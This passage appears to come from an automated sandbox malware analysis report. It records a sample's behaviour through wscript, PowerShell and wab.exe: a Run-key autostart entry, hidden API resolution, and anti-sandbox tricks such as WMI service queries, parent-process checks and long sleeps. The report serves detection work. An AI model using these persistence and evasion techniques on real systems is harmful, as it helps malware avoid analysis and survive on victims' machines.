Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A82291 push edx; retf	10_2_03A8229A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A852D2 push cs; ret	10_2_03A85301
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A84D9F push ss; ret	10_2_03A84DAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A83118 push eax; iretd	10_2_03A8311A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A83571 push esp; ret	10_2_03A8358B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A848A4 push ebx; ret	10_2_03A848A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A82845 push cs; iretd	10_2_03A8284F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044693D push ecx; ret	19_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044DB70 push eax; ret	19_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044DB70 push eax; ret	19_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00451D54 push eax; ret	19_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044B090 push eax; ret	21_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044B090 push eax; ret	21_2_0044B0CC

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstes			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstes			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 21_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

21_2_004047CB

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 45859B3

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

19_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
